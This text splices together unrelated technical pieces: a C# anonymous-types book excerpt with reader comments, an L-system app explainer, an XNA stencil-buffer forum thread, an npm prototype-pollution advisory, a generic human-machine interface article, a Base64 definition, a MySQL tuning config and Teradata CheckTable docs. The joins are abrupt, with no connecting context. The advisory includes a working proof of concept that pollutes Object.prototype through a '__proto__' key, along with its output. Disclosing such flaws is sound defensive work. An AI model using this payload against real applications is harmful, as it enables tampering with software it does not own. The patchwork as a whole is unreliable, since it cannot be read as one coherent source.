of type String), the compiler knows that these two objects are of the exact same type. Now,
I use C#’s implicitly typed array feature (no type specified between the new and the []s) so
that the compiler will infer the type of the array itself, construct this array object, and initialize
its references to the two instances of the one anonymous type. Finally, a reference to this
array object is assigned to the kids local variable, the type of which is inferred by the compiler
due to C#’s implicitly typed local variable feature.
I show the foreach loop as an example of how to use this array that was just created and initialized
with the two anonymous type objects. I have to use an implicitly typed local variable
(kid) for the loop, too. When I run this code, I get the following output:
Aidan
Grant
Comments (5)
1. grnemo says:
The book is not at pre-order any more, but we have not heard from Amazon since they had informed us, that the dispatching day has changed. My order remains open (after the preorder period ended) and they seem to blame the publisher for the delays.
2. Steve Weiss says:
Hello Aggelos,
Ah yes; it’s a database-driven world in which we live…
What appears to have happened is that the book became available through our wholesale distributor (Ingram) *before* Amazon officially received it in their own distribution centers.
In the rare cases where this happens, Amazon would usually have the book shipped from the wholesaler directly to you, rather than wait and ship to you from their own warehouse(s) when the books arrive, which should be any day now if they haven’t arrived already.
In short: It’s all in the name of having the systems calibrated to deliver the book to you as soon as possible; it’s just that the systems don’t always express this intent as eloquently as possible.
Sorry for the hassle, and let me know if the book hasn’t arrived by later today (Friday, Feb 19) or if you’ve not received further communications from Amazon. One way or another, we’ll get you that book!
Thanks,
–Steve Weiss
Associate Publisher, O’Reilly Media / Microsoft Press Division
steve(at)oreilly.com
3. Marius says:
I have ordered the book from the microsoft-press.co.uk.
I have received an update on 19’th of february 2010 that the order has not yet been dispatched. I notice that microsoft-press.co.uk is down. what is happening?
4. MAfshin says:
Please help me, how can I request a translation permission from MS Press for this book?
5. MAfshin, write to Sharon Payne at O’Reilly: sharon [at] oreilly.co.uk
How does FractalScapes work
FractalScapes is an L-system fractal generator. An L-system is basically a graphics language with very simple rules. In most L-systems, drawing rules are represented by letters of the alphabet, such as "F" meaning draw a line. FractalScapes has replaced the letters with icons, so in FractalScapes,
draw a line is represented by the icon: kBIconRuleDrawLine
Turn left is kBIconRuleRotateCC.
Turn right is kBIconRuleRotateC.
By putting the rules in sequence, you tell the application what to draw. so the sequence:
kBIconRuleDrawLine kBIconRuleRotateCC kBIconRuleDrawLine kBIconRuleRotateC kBIconRuleDrawLine
Draws a horizontal line connected to an upward vertical line connected to a rightward horizontal line.
Every L-system fractal starts with an initial sequence of rules, which can be like the one above; the starting rules are labeled "Start" in the app editor. You can draw all sorts of shapes with curves, fills and lines, but that is not the cool part. The cool part happens next, with replacement rules, which rewrite the sequence generation by generation (see "Replacement Rules" in the FAQ, and the sketch below).
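For readers who want to see the rewriting idea in ordinary code, here is a generic L-system sketch. It is not FractalScapes source; the characters "F", "+" and "-" are arbitrary stand-ins for the draw-line, turn-left and turn-right icons:
using System;
using System.Collections.Generic;
using System.Text;

class LSystemSketch
{
    static void Main()
    {
        // Start sequence: draw, turn left, draw, turn right, draw
        // ("F" = draw line, "+" = turn left, "-" = turn right).
        string state = "F+F-F";

        // Replacement rule: every draw-line is replaced by the whole start shape.
        var rules = new Dictionary<char, string> { { 'F', "F+F-F" } };

        // Apply the replacement rules for a few generations.
        for (int generation = 0; generation < 3; generation++)
        {
            var next = new StringBuilder();
            foreach (char symbol in state)
                next.Append(rules.TryGetValue(symbol, out string replacement)
                            ? replacement
                            : symbol.ToString());
            state = next.ToString();
        }

        Console.WriteLine(state); // the fully rewritten drawing sequence
    }
}
Each generation replaces every draw-line with a copy of the whole start shape, which is what makes the drawing grow into a fractal.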
XNA Stencil Buffer problem, with code
#1 danromeo (Members, Reputation: 238). Posted 01 September 2014 - 01:47 PM
hi.
I'm trying to create a simple stencil mask on a RenderTarget2D from a bunch of primitives, and then later draw pixels from that render target to another rendertarget in a shader based on the stencil test pass/fail. Code is below. The results that I'm getting seems to be that the stencil test either always passes every pixel or always fails every pixel, regardless of which settings I try for DepthStencilStates.
The idea is to create an overhead view of a forested world and then lay that view over the terrain when viewed from overhead, rather than redrawing the forests on every frame. BUT my question is about stencil buffers.
I set up the following resources:
MyRenderTarget = new RenderTarget2D(graphicsDevice, mapSize, mapSize, true, SurfaceFormat.Color, DepthFormat.Depth24Stencil8, 0, RenderTargetUsage.DiscardContents);
NewRenderTarget = new RenderTarget2D(graphicsDevice, mapSize, mapSize, true, SurfaceFormat.Color, DepthFormat.Depth24Stencil8, 0, RenderTargetUsage.DiscardContents);
DepthStencilState writeStencil = new DepthStencilState()
{
StencilEnable = true,
DepthBufferEnable = false,
ReferenceStencil = 1,
StencilFunction = CompareFunction.Always,
StencilPass = StencilOperation.Replace,
};
DepthStencilState stencilMask = new DepthStencilState()
{
StencilEnable = true,
DepthBufferEnable = false,
ReferenceStencil = 0,
StencilFunction = CompareFunction.NotEqual,
StencilPass = StencilOperation.Keep,
};
During initialization, to create my overhead render target with stencil, I set the DepthStencilState to writeStencil and draw the forests to the rendertarget, which SHOULD give me a stencil buffer containing 0's where there are no trees and 1's where there are trees.
graphicsDevice.SetRenderTarget(MyRenderTarget);
graphicsDevice.Clear(ClearOptions.DepthBuffer | ClearOptions.Stencil | ClearOptions.Target, Microsoft.Xna.Framework.Color.Black, 1.0f, 0);
graphicsDevice.DepthStencilState = writeStencil;
foreach (EffectPass pass in effect.CurrentTechnique.Passes)
{
pass.Apply();
graphicsDevice.DrawUserIndexedPrimitives<Position4Texture>(PrimitiveType.TriangleList,
Vertices, 0, 4, Indices, 0, 2);
}
graphicsDevice.DepthStencilState = DepthStencilState.Default;
And then at render time I render my terrain, and then in a second pass I set the DepthStencilState to stencilMask and render a quad over the terrain pulling pixels from MyRenderTarget based on stencil test pass/fail:
graphicsDevice.SetRenderTarget(NewRenderTarget);
graphicsDevice.Clear(ClearOptions.DepthBuffer | ClearOptions.Stencil | ClearOptions.Target, Microsoft.Xna.Framework.Color.Black, 1.0f, 0);
graphicsDevice.DepthStencilState = DepthStencilState.Default;
< DRAW TERRAIN TO NewRenderTarget >
graphicsDevice.DepthStencilState = stencilMask;
effect.Parameters["Texture"].SetValue(MyRenderTarget);
foreach (EffectPass pass in effect.CurrentTechnique.Passes)
{
pass.Apply();
graphicsDevice.DrawUserIndexedPrimitives<Position4Texture>(PrimitiveType.TriangleList,
Vertices, 0, 4, Indices, 0, 2);
}
graphicsDevice.DepthStencilState = DepthStencilState.Default;
And in the simple pixel shader I am returning:
return tex2D(Texture, input.TexCoord);
I've tried various settings in the DepthStencilStates, and the end result is the stencil test either always passes all pixels, giving me overhead forests with black terrain, or always fails, giving me terrain with no forests. I've never used stencil buffers before but would like to make extensive use of them. Can somebody tell me what I'm doing wrong?
THANKS
#2 phil_t (Crossbones+, Reputation: 5305). Posted 02 September 2014 - 10:54 AM
I already answered this for you: http://www.gamedev.net/topic/660306-xna-4-rendertarget-stencil-buffer/#entry5176471
#3 danromeo (Members, Reputation: 238). Posted 02 September 2014 - 11:44 AM
Phil,
You answered with "So you can't set a new render target and use the stencil buffer from a previous one.", and then asked exactly what I was trying to do. I was unable to come back to this for several days so I started a new thread, including code explaining exactly what I'm trying to do.
Maybe I misunderstand your answer, but I'm not setting a new render target and using the stencil buffer from a previous one. Are you saying that I need to set the rendertarget, write to the stencil buffer, and then immediately send the rendertarget to the pixel shader for the comparison operation? This makes no sense.....you can't send an active rendertarget to the pixel shader, it will error out. Or do you mean that I can only perform a stencil test on the active rendertarget? In this case if I lose my stencil buffer as soon as I set the rendertarget, how can stencil buffering be in any way useful at all? Would I have to create the stencil and perform the comparison test all inside one draw call?
SO if what I'm trying to do isn't possible maybe I could trouble you to explain exactly how I can do this? Really all I'm trying to do is mask certain pixels out of a rendertarget with an early stencil test.....seems pretty simple. This is driving me nuts, and I've found several other examples of people with pretty much the same problem who haven't found a resolution, or people who made it work in XNA 3 but couldn't make it work in XNA 4. I found one guy who says you need to use preservecontents on a rendertarget in order to write to the stencil buffer, but still no dice, although my tests do indicate that the stencil buffer is never being written to.
I can't even find a decent explanation of how stencil buffering works. I might be conceptually completely out of the ballpark. For example, I *think* what I'm doing is comparing the stencil buffer of a rendertarget to a simple reference value. Is this correct? Am I comparing the contents of the rendertarget stencil buffer to the stencil buffer of the back buffer, noting that I'm not drawing to the back buffer? Is drawing to the backbuffer the only circumstance where stencil buffering will work?
Or maybe you could help me with simple code describing how simple a stencil mask works, that actually does work?
Much Confusion. I really appreciate your help.
#4 phil_t (Crossbones+, Reputation: 5305). Posted 02 September 2014 - 11:46 PM
In this case if I lose my stencil buffer as soon as I set the rendertarget, how can stencil buffering be in any way useful at all? Would I have to create the stencil and perform the comparison test all inside one draw call?
Not inside one draw call, but in several draw calls without switching render targets. You generally draw stuff to set the stencil bits how you want (often disabling color writes), and then draw the "actual stuff" that draws based on the stencil comparison.
I think (not sure) that in raw DirectX in PCs you can manage the visual buffer and depth/stencil buffer separately, but they are tied together in XNA (presumably because of this limitation in the Xbox).
For example, I *think* what I'm doing is comparing the stencil buffer of a rendertarget to a simple reference value. Is this correct?
Yes. Or simply writing to the stencil buffer.
So for a very simple use case, maybe you want to draw a circle and have a square cut out of it. So you would first draw the square and have your DepthStencilState set up to set the stencil to 1*, say (GraphicsDevice.Clear will clear it to 0 by default, unless you specify otherwise). Since you don't want to actually see the square, you would also have disabled color writes by setting ColorWriteChannels to None in the BlendState you use. So now you have nothing visible, but you have a square in the stencil buffer where the values are 1.
Next, you would draw the circle (without changing rendertargets) with your DepthStencilState set up to draw only where the stencil buffer does not contain a 1. So the circle will draw everywhere except where the square is.
Here's an XNA stencil buffer example I found. I don't know if it will be helpful, but it should show you how to set up the DepthStencilState to get the functionality you want:
http://scott-franks.com/alpha-masking-in-xna-via-the-stencil-buffer/
*Note that when setting stencil values, the stencil is set depending on whether a pixel is output, even if that pixel is transparent. So if you are setting irregular shapes by drawing sprites, you generally want to be using alpha-testing (which discards transparent pixels), not alpha blending.
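Putting that together, here is a minimal sketch of the square-cut-out-of-a-circle idea (this is an illustration rather than tested code; it assumes XNA 4.0, a SpriteBatch, and hypothetical texture and position variables):
// Pass 1: write 1s into the stencil where the square is, without drawing any colour.
DepthStencilState writeStencil = new DepthStencilState()
{
    StencilEnable = true,
    DepthBufferEnable = false,
    StencilFunction = CompareFunction.Always, // always pass...
    StencilPass = StencilOperation.Replace,   // ...and write ReferenceStencil
    ReferenceStencil = 1,
};

BlendState noColorWrites = new BlendState()
{
    ColorWriteChannels = ColorWriteChannels.None, // stencil only, nothing visible
};

// Pass 2: draw only where the stencil is NOT 1 (i.e. outside the square).
DepthStencilState stencilMask = new DepthStencilState()
{
    StencilEnable = true,
    DepthBufferEnable = false,
    StencilFunction = CompareFunction.NotEqual, // pass where stencil != ReferenceStencil
    StencilPass = StencilOperation.Keep,
    ReferenceStencil = 1,
};

graphicsDevice.Clear(ClearOptions.Target | ClearOptions.Stencil, Color.Black, 1.0f, 0);

spriteBatch.Begin(SpriteSortMode.Immediate, noColorWrites, null, writeStencil, null);
spriteBatch.Draw(squareTexture, squarePosition, Color.White);
spriteBatch.End();

spriteBatch.Begin(SpriteSortMode.Immediate, BlendState.AlphaBlend, null, stencilMask, null);
spriteBatch.Draw(circleTexture, circlePosition, Color.White);
spriteBatch.End();
Both Begin/End pairs target the same render target, so the stencil bits written in the first pass are still there for the second pass.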
#5 danromeo (Members, Reputation: 238). Posted 03 September 2014 - 06:31 PM
Phil,
Very helpful, thank you very much. Simply put, when I set a new rendertarget I lose the stencil buffers on previous rendertargets. Is this correct? So stenciling needs to be done in a multipass inside of a single SetRenderTarget, yes? What a PITA....
expand-keys
Vulnerability: prototype pollution
Severity: 7.3
Language: JavaScript
Registry: npm
Description
expand-keys is vulnerable to Prototype Pollution.
Proof of Concept
1. Create the following PoC file:
// poc.js
var {expandKeys} = require("expand-keys")
console.log("Before : " + {}.polluted);
expandKeys({"__proto__.polluted": "Yes! Its Polluted"})
console.log("After : " + {}.polluted);
2. Execute the following commands in terminal:
npm i expand-keys # Install affected module
node poc.js # Run the PoC
3. Check the output:
Before : undefined
After : Yes! Its Polluted
Human-Machine Interfaces: Enhancing Interaction with Technological Systems
Human-machine interfaces (HMIs) represent the communication bridges between human operators and machines. As technology advances, these interfaces evolve, facilitating more efficient and intuitive interactions with various systems and devices.
The development of these interfaces encompasses a wide range of disciplines, including computer science, cognitive psychology, and industrial design, each contributing to the refinement of how humans control and manoeuvre complex machinery and systems.
The effectiveness of a human-machine interface is measured by how seamlessly it enables users to perform their desired tasks. Good HMIs are characterised by their ease of use, responsiveness, and the degree to which they reduce the likelihood of operator error.
Across industries such as manufacturing, aviation, and healthcare, the adaptation of advanced interfaces, including touchscreens, gesture controls, and voice recognition, have revolutionised operational workflows, improving safety and productivity.
As the integration of artificial intelligence and machine learning into these interfaces progresses, they are becoming increasingly sophisticated. Predictive text input, adaptability to user preferences, and automation of routine tasks are just a few of the enhancements that contribute to the modern human-machine interface's capability.
This continual transformation opens up new horizons for how humans interact with technology, continually pushing the boundaries of what machines can accomplish under human guidance.
Overview of Human-Machine Interfaces
Human-machine interfaces (HMIs) are essential in facilitating interaction between people and technology, driving efficiency and effectiveness across various applications. These interfaces range from simple buttons and levers to complex graphical user interfaces (GUIs), each designed to minimise cognitive workload and maximise usability.
Defining Human-Machine Interfaces
Human-machine interfaces (HMIs), also known as man-machine interfaces, create a bridge between the user and the machine, allowing for control and data exchange. The design and implementation of HMIs consider several factors to ensure optimal performance and user experience.
Usability: Central to HMI design, usability refers to the ease with which a user can learn to operate the interface, effectively achieve their goals, and be satisfied with their interaction.
Complexity: The complexity of an HMI should align with the task at hand, providing precise control without overwhelming users. A well-designed interface manages complexity without adding unnecessary cognitive workload.
Graphical User Interfaces (GUIs): GUIs are a prevalent type of HMI, employing graphical icons and visual indicators to present information. They are designed to be intuitive, often making use of touchscreens for direct manipulation of on-screen objects.
• GUI Features:
• Icons and buttons
• Menus and toolbars
• Dialogue boxes and windows
Performance: The effectiveness of an HMI is measured by how well it supports users in performing their tasks. This includes rapid response times, high accuracy, and predictability of the system's behaviour in response to user actions.
Cognitive Workload: A key goal for human-machine interfaces is to minimise the cognitive effort required to operate them. Interfaces should be designed to be understandable and not cognitively taxing, allowing users to focus on their primary tasks.
Technological Components and Hardware
The core elements for facilitating efficient human-machine interaction encompass advanced display technologies and robust interaction hardware. They are often supported by intricate systems such as industrial controllers and various sensors.
Display and Visualisation Technologies
Touch Screens: These devices serve as both input and output apparatus, providing an intuitive user interface for direct manipulation of on-screen objects. Remote Monitoring displays allow for the observation of systems at a distance, which is especially beneficial in industrial settings.
• Display: Full-colour, high-resolution LCD or OLED panels are standard, improving clarity for users.
• HMIs (Human-Machine Interfaces): Typically consists of graphical user interfaces (GUIs) that include visual elements such as alarms and indicators to alert the operator to the machine's status.
Interaction Hardware
Buttons and Switches: These are tactile components for controlling machine functions and are designed for quick and straightforward interaction.
• Hardware: Rigorous design focuses on durability and ergonomic efficiency, ensuring that switches and buttons can withstand frequent use.
Keyboards and Mice: Often used for more complex interactions, they provide precise control over the machine's functions.
Industrial Controllers and Sensors
PLCs (Programmable Logic Controllers): Central to industrial automation, they execute pre-programmed commands based on sensor inputs to control machinery.
• Sensors: Various types are employed to detect environmental conditions, positions, and other parameters, relaying crucial data back to the PLCs.
• Alarms: These are designed to notify operators of critical situations requiring immediate attention, often integrated with the PLCs for rapid response.
System Design and Integration
Effective human-machine interface design hinges on the seamless integration of the system’s components within an overarching framework. It ensures optimal usability and functionality.
This section delves into the essential elements of interface design principles and the ongoing considerations for system requirements and scalability.
Interface Design Principles
A successful interface should balance aesthetics with functionality. Consistency in layout and controls enables users to learn the system efficiently. An emphasis on clarity reduces the risk of errors, improving overall usability.
The interface must allow for:
• Accurate feedback on user actions
• Clear visual hierarchies for task prioritisation
• Accessibility features for diverse user groups
Interaction design principles dictate that the interface should be intuitive, facilitating a quick learning curve and allowing users to focus on their tasks rather than the tools they are using.
System Requirements and Scalability
The backbone of any human-machine interface lies in its capacity to meet initial system requirements and to grow over time (scalability). The design must address the following:
• Hardware compatibility: Ensuring that the system functions across various platforms and industrial control systems.
• Operating systems: Selecting the right OS for stability and support.
• Interoperability: Allowing diverse systems and applications to work together without any impediments.
• Security: Implementing robust security measures to protect against unauthorised access or manipulation of the system.
• Maintenance and Support: Planning for regular updates and technical support to ensure the system’s longevity.
• Cost: Providing cost-effective solutions while not compromising on quality and performance.
A system that scales effectively will handle increased loads and can adapt to evolving business needs or technological advancements. It is imperative to anticipate future requirements and design a system that can be upgraded or expanded with minimal disruption to the existing operations.
Application Domains
Human-machine interfaces (HMIs) are pivotal in augmenting efficiency and precision across numerous sectors. They are instrumental in the evolution of industry practices, enabling more intuitive interactions between users and machinery.
Industrial and Manufacturing
The implementation of HMIs within the industrial and manufacturing sectors has been transformational, propelling the momentum of Industry 4.0.
Engineers utilise advanced HMIs to oversee and manipulate industrial processes, enhancing automation and improving production rates.
For instance, in manufacturing, touchscreen panels and control systems allow for real-time monitoring and adjustments, culminating in heightened productivity and safer work environments.
• Industrial Process Control:
• Automation Systems: Simplifying complex operations
• Safety Measures: Minimising human error
Energy and Resource Management
In energy and resource management, particularly within oil and gas, HMIs serve as the nerve centre for controlling intricate operations.
They provide the means for technicians to interact seamlessly with sophisticated systems, facilitating the management of energy production and distribution.
This has led to more sustainable practices, such as recycling processes, being easier to manage and optimise through precise data and control interfaces.
• Oil and Gas Sector:
• Monitoring Equipment: Track performance metrics
• Operational Efficiency: Streamline procedures for energy yield
Consumer Electronics and Automotive
The realm of consumer electronics and the automotive industry has seen a significant integration of HMIs.
From the touchscreens in smartphones to the interactive dashboards in cars, these interfaces have become a staple of modern design and usability.
In vehicles, they contribute to safer and more enjoyable driving experiences, as drivers have access to necessary information and control without distraction.
Systems Operations and Data Management
Effective systems operations and data management are crucial for the integrity and efficiency of human-machine interfaces. They ensure that operators can monitor processes seamlessly and that performance data is acquired and analysed accurately, minimising the potential for human error.
Process Control and Monitoring
Human-machine interfaces in process control utilise Supervisory Control and Data Acquisition (SCADA) systems and Distributed Control Systems (DCS) to provide a high level of automation and remote access.
Operators leverage these systems to manage power distribution and process flows, depicted by P&ID images.
The integration of Internet of Things (IoT) expands the capabilities of these systems, enhancing overall performance.
SCADA systems, in particular, are known for their ability to connect with Remote Terminal Units (RTUs) and communicate using protocols such as Modbus and MQTT.
The use of Graphs and Charts allows for real-time visualisation of process data, aiding in decision-making and immediate response to system changes.
Data Acquisition and Analysis
Data acquisition involves capturing and logging critical data from various sensors and input devices.
The gathered data is managed and stored in sophisticated databases, permitting intricate analysis and historical data review.
Data logging is an essential component, as it ensures that all relevant information is recorded for compliance and operational optimisation.
Through Enterprise Resource Planning (ERP) systems, data from all aspects of operation are integrated, providing a comprehensive view of organisational performance.
The utilisation of advanced analytics allows for predictive maintenance and minimises downtime.
Additionally, remote access via secure networks allows for off-site management and real-time data analysis, enhancing the flexibility and responsiveness of operations.
Emerging Trends and Future Outlook
In the realm of human-machine interfaces, significant advancements are anticipated, particularly in the realms of smart technologies and sophisticated user interfaces that promise enhanced interactions and heightened efficiencies across various domains.
In the next paragraph, we'll take a closer look at some innovations.
Smart Technologies and IoT
The Internet of Things (IoT) continues to revolutionise how people interact with electronic devices.
In recent times we assisted at the integration of IoT into smartphones, tablets, and other electronic devices to streamline data acquisition and control processes.
This integration is pivotal in minimising cognitive workload and reducing industrial accidents.
Devices interconnected through the Internet of Things provide robust access control systems, ensuring secure and efficient automation processes.
1. Integration Examples:
• Smartphones with built-in sensors for environmental monitoring.
• Tablets used for remote control of home automation systems.
2. Impact of IoT:
• Reduction in cognitive workload by using automated alerts and notifications.
• Decrease in industrial accidents via predictive maintenance alerts.
Base64
Definition - What does Base64 mean?
Base64 is an encoding and decoding technique used to convert binary data to an American Standard Code for Information Interchange (ASCII) text format, and vice versa. It is used to transfer data over media that only support ASCII formats, such as email messages on Multipurpose Internet Mail Extensions (MIME) and Extensible Markup Language (XML) data.
Base64 is also known as Base64 Content-Transfer-Encoding.
Techopedia explains Base64
Base64 is a binary-to-text encoding scheme that is generally used to transfer content-based messages over the Internet. It works by dividing every three bytes (24 bits) of binary data into four six-bit units, each of which is mapped to a character in a 64-radix numeral system and represented as seven-bit ASCII text. Because every three bytes of input become four characters of output, the converted data is 33 percent, or one-third, larger than the original data.
Like binary data, Base64 encoded resultant data is not human readable.
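As a quick illustration, here is a minimal sketch using the .NET Convert class (the input string is an arbitrary example):
using System;
using System.Text;

class Base64Demo
{
    static void Main()
    {
        // Encode: every 3 input bytes become 4 output characters (~33% larger).
        byte[] binary = Encoding.UTF8.GetBytes("Hello, world!");
        string encoded = Convert.ToBase64String(binary);
        Console.WriteLine(encoded); // SGVsbG8sIHdvcmxkIQ==

        // Decode back to the original bytes.
        byte[] decoded = Convert.FromBase64String(encoded);
        Console.WriteLine(Encoding.UTF8.GetString(decoded)); // Hello, world!
    }
}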
MySQL optimization: my.ini configuration explained
[mysqld]
port = 3306
server-id = 1
socket = /tmp/mysql.sock
skip-name-resolve
# Disables DNS resolution for incoming connections, eliminating the time MySQL spends on DNS lookups. Note: with this option enabled, all remote-host connection grants must use IP addresses, otherwise MySQL cannot process the connection request! Note: if you connect to MySQL from a WinForms client, adding this line gives a large speed-up.
skip-locking
# Avoids external locking of MySQL, reducing the chance of errors and improving stability.
back_log = 384
# Specifies how many connection requests MySQL can queue. When the main MySQL thread receives a very large number of connection requests in a short time, this parameter takes effect: the main thread spends a short time checking connections and starting new threads. back_log sets how many requests can be held in the queue in the short period before MySQL temporarily stops answering new requests. If the system receives many connections in a short time, increase this value; it is the size of the listen queue for incoming TCP/IP connections. Each operating system has its own limit on this queue size, and setting back_log above the OS limit has no effect. The default is 50; for Linux, a value below 512 is recommended.
key_buffer_size = 32M
# key_buffer_size is critical for MyISAM tables. If you use only MyISAM tables, set it to 30-40% of available memory. A reasonable value depends on index size, data volume and load. Remember that MyISAM tables use the operating system cache for data, so leave some memory for that; in many cases the data is much larger than the indexes. Still, always check whether the whole key_buffer is actually in use: the situation where the .MYI files total only 1GB while key_buffer is set to 4GB is quite rare, and would be a waste. If you rarely use MyISAM tables, keep key_buffer_size below 16-32MB, enough for the indexes of disk-based temporary tables.
innodb_buffer_pool_size = 2.4G
# Critical for InnoDB tables. InnoDB is far more sensitive to buffering than MyISAM. MyISAM can run acceptably with the default key_buffer_size, whereas InnoDB crawls with the default innodb_buffer_pool_size. Since InnoDB caches both data and indexes, there is no need to leave much memory to the operating system, so if the server runs only InnoDB you can set it as high as 70-80% of available memory. If your data set is small and will not grow sharply, there is no need to make innodb_buffer_pool_size very large.
innodb_additional_mem_pool_size = 20M
# This option does not affect performance much, at least on operating systems with more or less enough memory to allocate. But if you still want to set it to 20MB (or more), look at how much other memory InnoDB needs to allocate.
innodb_log_file_size = 512M
# Important under heavy write load, especially with large data sets. Larger values give relatively better performance, but note that recovery time may increase. I usually set 64-512MB depending on server size.
innodb_log_buffer_size = 16M
# The default is acceptable for moderate write loads and short transactions. If there are update spikes or a heavy load, consider increasing it. Setting it too high wastes memory: it is flushed every second, so there is no need for more than one second's worth of space. 8-16MB is usually enough; the smaller the system, the smaller the value.
innodb_flush_log_at_trx_commit = 2
# Puzzled why InnoDB is 1000 times slower than MyISAM? Perhaps you forgot to change this parameter. The default value 1 means that every committed transaction (or every statement outside a transaction) is flushed to disk, which is quite expensive, especially without a battery-backed cache. Many applications, especially those migrated from MyISAM, work fine with 2, which means the log is not flushed to disk, only to the operating system cache. The log is still flushed to disk every second, so you typically lose no more than 1-2 seconds' worth of updates. Setting it to 0 is faster still, but relatively unsafe: some transactions are lost if the MySQL server crashes. With 2, only the transactions flushed no further than the OS cache can be lost.
max_allowed_packet = 4M
thread_stack = 256K
sort_buffer_size = 6M
# Buffer size available for query sorting. Note: this memory is allocated per connection! With 100 connections, the total sort buffer allocation is 100 × 6 = 600MB. For servers with around 4GB of memory, 6-8M is recommended.
read_buffer_size = 4M
# Buffer size available for sequential read queries. Like sort_buffer_size, this memory is also allocated per connection!
join_buffer_size = 8M
# Buffer size available for join operations. Like sort_buffer_size, this memory is also allocated per connection!
myisam_sort_buffer_size = 64M
table_cache = 512
# Opening a table can be expensive. For example, MyISAM marks the table as in use in the MYI file header. You do not want this to happen too often, so the cache is usually increased so that as many open tables as possible stay cached. This uses operating system resources and memory, which is of course not a problem on current hardware. If you have more than 200 tables, 1024 is probably appropriate (every thread needs to open tables); if the connection count is large, increase it further. I have seen it set to 100,000.
thread_cache_size = 64
# Creating and destroying threads can be expensive, and every connect/disconnect requires it. I usually set it to at least 16. If the application has large jumps in concurrent connections and Threads_Created is large, I increase the value. The goal is that new threads need not be created during normal operation.
query_cache_size = 64M
# Size of the MySQL query cache. You can observe it from the MySQL console with:
# > SHOW VARIABLES LIKE '%query_cache%';
# > SHOW STATUS LIKE 'Qcache%';
# If Qcache_lowmem_prunes is very large, the cache frequently runs short of memory. If Qcache_hits is very large, the query cache is used very heavily; if it is small, the cache may actually hurt efficiency and you may consider disabling it. If Qcache_free_blocks is very large, the cache is heavily fragmented.
tmp_table_size = 256M
max_connections = 768
# Maximum number of concurrent MySQL connection processes. If you often see the "Too many connections" error when visiting the forum, increase this value.
max_connect_errors = 10000000
wait_timeout = 10
# Maximum connection time for a request; for servers with around 4GB of memory, 5-10 is fine.
thread_concurrency = 8
# Set this to the number of logical CPUs × 2. In this example the server has 2 physical CPUs, each supporting hyper-threading (H.T), so the actual value is 4 × 2 = 8.
skip-networking
# Enabling this option completely disables MySQL's TCP/IP connection method. Do not enable it if the web server accesses the MySQL database server over a remote connection, otherwise connections will fail!
The SHOW STATUS command
The fields have the following meanings:
aborted_clients: number of connections aborted because the client terminated improperly
aborted_connects: number of failed attempts to connect to MySQL
com_xxx: number of times each xxx statement was executed (one counter per statement)
connections: number of connection attempts to MySQL
Created_tmp_disk_tables: temporary tables created on disk
Created_tmp_tables: temporary tables created in memory
Created_tmp_files: number of temporary files
Key_read_requests: the number of requests to read a key block from the cache
Key_reads: the number of physical reads of a key block from disk
Max_used_connections: maximum number of connections in use at the same time
Open_tables: tables currently open
Open_files: files currently open
Opened_tables: total number of tables that have been opened
Questions: number of statements sent to the server
Sort_merge_passes: if this value is large, increase the sort_buffer value in my.cnf
Uptime: number of seconds the server has been running
Performance tuning suggestions:
1. If Opened_tables is too large, increase table_cache in my.cnf.
2. If Key_reads is too large, increase key_buffer_size in my.cnf. The cache miss rate can be computed as Key_reads/Key_read_requests.
3. If Handler_read_rnd is too large, many of your SQL queries scan entire tables instead of making use of indexes.
4. If Threads_created is too large, increase thread_cache_size in my.cnf. The cache hit rate can be computed from Threads_created/Connections.
5. If Created_tmp_disk_tables is too large, increase tmp_table_size in my.cnf so that memory-based temporary tables are used instead of disk-based ones.
17.10 - Usage Notes - Advanced SQL Engine - Teradata Database
Teradata Vantage™ - Database Utilities
Product: Advanced SQL Engine, Teradata Database
Release Number: 17.10
Release Date: July 2021
Content Type: Configuration
Publication ID: B035-1102-171K
Language: English (United States)
The following rules apply to the use of wildcard syntax in the CHECK command. Assume that the databases and tables in the examples exist in the system, unless stated otherwise.
You can specify the following valid ASCII characters in the wildcard syntax:
• A … Z
• a … z
• 0 … 9
• _ (low line or underscore)
• $ (dollar sign)
• # (number sign)
You cannot use digits 0 … 9 as wildcards to describe the first character in the name.
Example 1: The following is a valid command:
CHECK db1.t[#af_2r]1 AT LEVEL ONE;
Example 2: The following is not a valid command:
CHECK db[#,kA-d159]xy AT LEVEL ONE;
The above command results in a syntax error because the wildcards specified for database name include the non-valid comma (,). For information on syntax error messages, see Syntax Error Messages.
You must specify the wildcard characters within square brackets. The wildcard syntax begins with a left square bracket ([) and ends with a right square bracket (]). Example 1: Databases db1, db2, db3, db4, and db5 exist, and you want only the tables in db1 and db5 checked. Type the following:
CHECK db[15] AT LEVEL ONE;
CheckTable checks all the tables in databases db1 and db5 at level one. The wildcard syntax defines two possible values (1 and 5) for the third character in the database name.
Example 2: Databases db1, dc1, dd1, and so on exist, and each database contains tables t1, t2, t3, and so on. Using the wildcard syntax in any place in the name, type the following:
CHECK d[bd]1.t[123] AT LEVEL ONE;
CheckTable checks tables t1, t2, t3 in databases db1 and dd1.
Example 3: To specify wildcard syntax in multiple places in a name, type the following:
CHECK db[12][pq] AT LEVEL TWO;
CheckTable checks databases db1p, db2p, db1q, and db2q at level two. The wildcard syntax defines the possible values for the third and fourth characters of the database name.
You cannot specify the special characters % and ? within wildcard syntax. However, you can use the special characters % and ? with any valid wildcard syntax. Example 1: Databases dba1, dba2, db11 and db12 exist, and you want to check databases dba1, dba2, db11, and db12. Type the following:
CHECK db[a1]? at level one;
This command is valid, because the ‘?’ is outside the wildcard syntax.
Example 2: The following is not a valid command, because the ‘?’ is not allowed in wildcard syntax.
CHECK db[a1?] at level one;
You can use wildcard syntax to specify the names or lists of the databases and tables to check and the list of databases or tables not to check. Example 1: Databases db1, db2, db3 and db4 exist, and you type the following:
CHECK db% exclude db[34] at level one;
Databases db1 and db2 are checked.
Example 2: Databases db1, db2, db3 and db4 exist, and all these databases have tables t1, t2, t3 and t4. You type the following:
CHECK db[23] exclude t[14] at level one;
CheckTable checks tables t2 and t3 in databases db2 and db3.
You can use wildcard syntax to specify a range of characters by separating two characters with a hyphen (-). For example, C and J separated by the hyphen (C-J) represent any characters lexically between C and J inclusive.
• The two characters should be of the same type: uppercase, lowercase, or digit.
• The two characters can be in ascending or descending lexical order. For example, [A-D] and [D-A] both specify the same range of characters: A through D inclusive.
Example 1:
CHECK db1.t[1-35] AT LEVEL ONE;
CheckTable checks the tables t1, t2, t3, and t5 in database db1 at level one. 1-3 is considered a range, and 5 is an additional value.
Example 2:
CHECK db[a-5] AT LEVEL ONE;
The check does not take place. CheckTable reports a syntax error because the range specified in dbname is invalid. For information on syntax error messages, see Syntax Error Messages.
